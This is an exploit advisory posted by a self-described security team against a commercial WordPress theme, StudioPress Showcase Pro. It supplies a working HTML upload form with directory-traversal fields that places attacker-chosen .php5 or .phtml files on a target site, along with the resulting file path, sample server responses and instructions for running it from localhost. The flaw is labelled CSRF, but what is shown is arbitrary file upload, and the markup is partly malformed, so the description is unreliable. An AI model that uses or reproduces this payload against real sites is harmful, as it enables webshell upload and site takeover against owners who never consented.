WordPress StudioPress Showcase Pro Genesis Framework CSRF

1. ####################################################################
2.  
3. # Exploit Title : WordPress StudioPress Showcase Pro Genesis Framework CSRF Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 22/05/2019
7. # Vendor Homepage : studiopress.com - gravityforms.com
8. # Software Information Link : my.studiopress.com/themes/showcase/
9. # Software Affected Versions : N/A
10. # Software Price Type : Paid Download - 129.95 $
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
18.  
19. ####################################################################
20.  
21. # Impact :
22. ***********
23. WordPress StudioPress Showcase Pro Genesis Framework is vulnerable to
24. cross-site request forgery, caused by improper validation of user-supplied input.
25. By persuading an authenticated user to visit a malicious Web site, a remote attacker
26. could send a malformed HTTP request to perform unauthorized actions.
27. An attacker could exploit this vulnerability to perform cross-site scripting
28. attacks, Web cache poisoning, and other malicious activities.
29.  
30. The web application does not, or can not, sufficiently verify whether a well-formed,
31. valid, consistent request was intentionally provided by the user who submitted the request.
32. When a web server is designed to receive a request from a client without any mechanism
33. for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
34. client into making an unintentional request to the web server which will be treated as an
35. authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
36. can result in exposure of data or unintended code execution.
37.  
38. ####################################################################
39.  
40. # CSRF Cross Site Request Forgery Exploit :
41. ****************************************
42. <title>WordPress StudioPress Showcase Pro Genesis Framework Input Exploiter</title>
43.  
44. <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
45.  
46. <body background=" ">
47.  
48. <input type="file" name="file" id="file"><br>
49. <input name="form_id" value="../../../" type=hidden">
50. <input name="name" value="kingskrupellos.html" type=''hidden">
51. <input name="gform_unique_id" value="../../" type="hidden">
52. <input name="field_id" value="" type="hidden">
53. <input type="submit" name="gform_submit" value="submit">
54.  
55. </form>
56.  
57. # Directory File Path :
58. ***********************
59. /_input__kingskrupellos.php5
60.  
61. /_input__[YOURFILENAME].php5
62.  
63. # Vulnerability Error :
64. *******************
65. {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
66.  
67. # Vulnerability Error [ Successful ] :
68. *******************************
69. {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
70.  
71. # Allowed File Extensions :
72. *************************
73. .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
74.  
75. # Example Usage for Windows :
76. ******************************
77. # Use with XAMPP Control Panel and your Localhost.
78. # Use from htdocs folder located in XAMPP
79.  
80. # 127.0.0.1/wordpressshowcasegenesisframeworkexploiter.html
81.  
82. ####################################################################
83.  
84. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
85.  
86. ####################################################################